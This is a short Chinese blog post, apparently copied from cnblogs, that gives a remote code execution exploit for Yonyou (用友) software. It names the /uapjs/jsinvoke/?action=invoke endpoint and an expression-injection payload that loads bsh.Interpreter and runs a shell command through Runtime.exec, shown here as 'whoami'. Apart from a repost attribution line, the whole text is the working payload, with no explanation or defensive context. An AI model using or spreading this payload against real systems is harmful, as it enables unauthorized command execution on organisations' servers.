用友/uapjs/jsinvoke/?action=invoke
${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)}
bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())
本文来自博客园,作者:匿名用户12,转载请注明原文链接:https://www.cnblogs.com/yysfa/p/17558820.html